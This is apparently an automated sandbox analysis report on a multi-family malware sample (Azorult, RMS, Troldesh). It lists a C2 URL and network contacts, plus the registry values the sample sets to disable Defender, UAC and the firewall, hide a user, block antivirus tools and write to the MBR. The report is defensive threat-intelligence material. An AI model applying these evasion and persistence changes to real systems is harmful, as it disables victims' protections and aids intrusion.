azorult | ea8fac7c65fb589b0d53560f5251f74f9e9b243478dcb6b3ea79b5e36449c8d9

Resubmissions

29-10-2024 11:51

241029-n1k2cswmhk 10

29-10-2024 10:57

241029-m2ltlsvcql 6

Analysis

max time kernel
1235s
max time network
1233s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-10-2024 11:51

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

.html
Size

1KB
MD5

84238dfc8092e5d9c0dac8ef93371a07
SHA1

4a3ce8ee11e091dd7923f4d8c6e5b5e41ec7c047
SHA256

ea8fac7c65fb589b0d53560f5251f74f9e9b243478dcb6b3ea79b5e36449c8d9
SHA512

d06b93c883f8126a04589937a884032df031b05518eed9d433efb6447834df2596aebd500d69b8283e5702d988ed49655ae654c1683c7a4ae58bfa6b92f2b73a

Score

10^/10

azorult rms troldesh aspackv2 bootkit defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation ransomware rat trojan upx

Malware Config

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe"	msiexec.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

Azorult.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

taskhostw.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms
Troldesh family
troldesh
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

Azorult.exeregedit.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs
evasion trojan

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

regedit.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

net.exenet1.exe

pid process

3328 net.exe
1688 net1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

pid	process
3328	net.exe
1688	net1.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

Processes:

Azorult.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

cmd.exeAzorult.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
64	netsh.exe
2632	netsh.exe
1240	netsh.exe
3452	netsh.exe
900	netsh.exe
3312	netsh.exe
3464	netsh.exe
4600	netsh.exe
4876	netsh.exe
4068	netsh.exe
2880	netsh.exe
4908	netsh.exe
212	netsh.exe
3364	netsh.exe
3832	netsh.exe
244	netsh.exe
6124	netsh.exe
1824	netsh.exe
3084	netsh.exe
1216	netsh.exe
4648	netsh.exe
2708	netsh.exe
5464	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

RDPWInst.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

6108 attrib.exe
4860 attrib.exe
2812 attrib.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
6108	attrib.exe
4860	attrib.exe
2812	attrib.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	acprotect
C:\ProgramData\Windows\vp8decoder.dll	acprotect

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exetaskhost.exewini.exeWScript.exeR8.exewinlog.exewinlogon.execheat.exeWScript.exeWScript.exeAzorult.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Azorult.exe

Executes dropped EXE 34 IoCs

Processes:

NoMoreRansom.exe607B60AD512C50B7D71DCCC057E85F1C.exeAzorult.exewini.exewinit.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.execheat.exeink.exetaskhost.exeP.exerfusclient.exeWinlockerVB6Blacksod.exeR8.exewinlog.exewinlogon.exeRar.exetaskhostw.exeRDPWInst.exewinlogon.exeRDPWInst.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exetaskhostw.exePowerPoint.exesys3.exe

pid	process
4716	NoMoreRansom.exe
4184	607B60AD512C50B7D71DCCC057E85F1C.exe
696	Azorult.exe
4884	wini.exe
3536	winit.exe
4508	rutserv.exe
64	rutserv.exe
2044	rutserv.exe
3360	rutserv.exe
1116	rfusclient.exe
4596	rfusclient.exe
744	cheat.exe
4432	ink.exe
4308	taskhost.exe
4664	P.exe
744	rfusclient.exe
3068	WinlockerVB6Blacksod.exe
1164	R8.exe
4964	winlog.exe
1628	winlogon.exe
4756	Rar.exe
180	taskhostw.exe
5196	RDPWInst.exe
5864	winlogon.exe
4532	RDPWInst.exe
5592	taskhostw.exe
5652	taskhostw.exe
2096	taskhostw.exe
980	taskhostw.exe
2800	taskhostw.exe
6768	taskhostw.exe
5948	taskhostw.exe
5880	PowerPoint.exe
4432	sys3.exe

Loads dropped DLL 17 IoCs

Processes:

WinlockerVB6Blacksod.exeMsiExec.exeMsiExec.exesvchost.exe

pid	process
3068	WinlockerVB6Blacksod.exe
3068	WinlockerVB6Blacksod.exe
688	MsiExec.exe
688	MsiExec.exe
688	MsiExec.exe
688	MsiExec.exe
688	MsiExec.exe
688	MsiExec.exe
688	MsiExec.exe
688	MsiExec.exe
688	MsiExec.exe
688	MsiExec.exe
4188	MsiExec.exe
688	MsiExec.exe
3068	WinlockerVB6Blacksod.exe
688	MsiExec.exe
4628	svchost.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4260	icacls.exe
3600	icacls.exe
540	icacls.exe
3340	icacls.exe
4924	icacls.exe
4456	icacls.exe
1352	icacls.exe
1224	icacls.exe
5584	icacls.exe
4724	icacls.exe
3536	icacls.exe
3324	icacls.exe
5408	icacls.exe
5104	icacls.exe
4860	icacls.exe
3380	icacls.exe
4860	icacls.exe
3996	icacls.exe
1468	icacls.exe
2144	icacls.exe
5108	icacls.exe
4860	icacls.exe
380	icacls.exe
5144	icacls.exe
5240	icacls.exe
900	icacls.exe
2756	icacls.exe
4560	icacls.exe
5708	icacls.exe
3356	icacls.exe
5592	icacls.exe
2268	icacls.exe
3960	icacls.exe
828	icacls.exe
1240	icacls.exe
4860	icacls.exe
380	icacls.exe
3592	icacls.exe
4532	icacls.exe
3956	icacls.exe
4924	icacls.exe
1824	icacls.exe
2888	icacls.exe
1560	icacls.exe
1080	icacls.exe
5148	icacls.exe
3476	icacls.exe
3960	icacls.exe
4384	icacls.exe
4968	icacls.exe
2204	icacls.exe
3452	icacls.exe
5428	icacls.exe
5920	icacls.exe
4860	icacls.exe
1180	icacls.exe
1604	icacls.exe
4992	icacls.exe
3960	icacls.exe
5288	icacls.exe
5232	icacls.exe
4760	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

taskhostw.exeNoMoreRansom.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\""	NoMoreRansom.exe

Blocklisted process makes network request 1 IoCs

Processes:

MsiExec.exe

flow pid process

160 688 MsiExec.exe
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Azorult.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4024 powershell.exe

flow	pid	process
160	688	MsiExec.exe

pid	process
4024	powershell.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exeWinlockerVB6Blacksod.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\J:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\R:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\O:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\Y:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\V:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\K:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\A:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\I:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\U:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\N:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\T:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\X:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\W:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\M:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\H:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\S:	WinlockerVB6Blacksod.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
defense_evasion

Clear Persistence
T1070.009

Processes:

cmd.exe

pid process

4092 cmd.exe

pid	process
4092	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

Processes:

flow	ioc
166	raw.githubusercontent.com
172	iplogger.org
187	raw.githubusercontent.com
846	raw.githubusercontent.com
137	raw.githubusercontent.com
165	raw.githubusercontent.com
173	iplogger.org
186	raw.githubusercontent.com
138	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

153 ip-api.com
474 ip-api.com

flow	ioc
153	ip-api.com
474	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Azorult.exeRDPWInst.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

PowerPoint.exesys3.exe

description ioc process

File opened for modification \??\PHYSICALDRIVE0 PowerPoint.exe
File opened for modification \??\PHYSICALDRIVE0 sys3.exe

description	ioc	process
File opened for modification	\??\PHYSICALDRIVE0	PowerPoint.exe
File opened for modification	\??\PHYSICALDRIVE0	sys3.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 550935.crdownload	autoit_exe
C:\ProgramData\Windows\winit.exe	autoit_exe
C:\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe
behavioral2/memory/5864-1220-0x0000000000670000-0x000000000075C000-memory.dmp	autoit_exe

Drops file in System32 directory 7 IoCs

Processes:

RDPWInst.exe607B60AD512C50B7D71DCCC057E85F1C.exepowershell.exe

description	ioc	process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File created	C:\Windows\SysWOW64\wins\DLLHOST.EXE	607B60AD512C50B7D71DCCC057E85F1C.exe
File opened for modification	C:\Windows\SysWOW64\msblast.exe	607B60AD512C50B7D71DCCC057E85F1C.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

Processes:

Azorult.exeregedit.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe

UPX packed file 21 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4716-446-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-448-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-447-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-449-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-474-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-475-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-506-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-528-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-534-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-554-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-627-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\Windows\vp8decoder.dll	upx
behavioral2/memory/4716-778-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4716-825-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
C:\ProgramData\Microsoft\Intel\winlogon.exe	upx
behavioral2/memory/1628-1144-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/memory/1628-1174-0x0000000000400000-0x0000000000419000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\autFFD2.tmp	upx
behavioral2/memory/5864-1217-0x0000000000670000-0x000000000075C000-memory.dmp	upx
behavioral2/memory/5864-1220-0x0000000000670000-0x000000000075C000-memory.dmp	upx

Drops file in Program Files directory 29 IoCs

Processes:

Azorult.exeRDPWInst.exeattrib.exemsiexec.exeattrib.exe

description	ioc	process
File opened for modification	C:\Program Files\Enigma Software Group	Azorult.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files\ESET	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
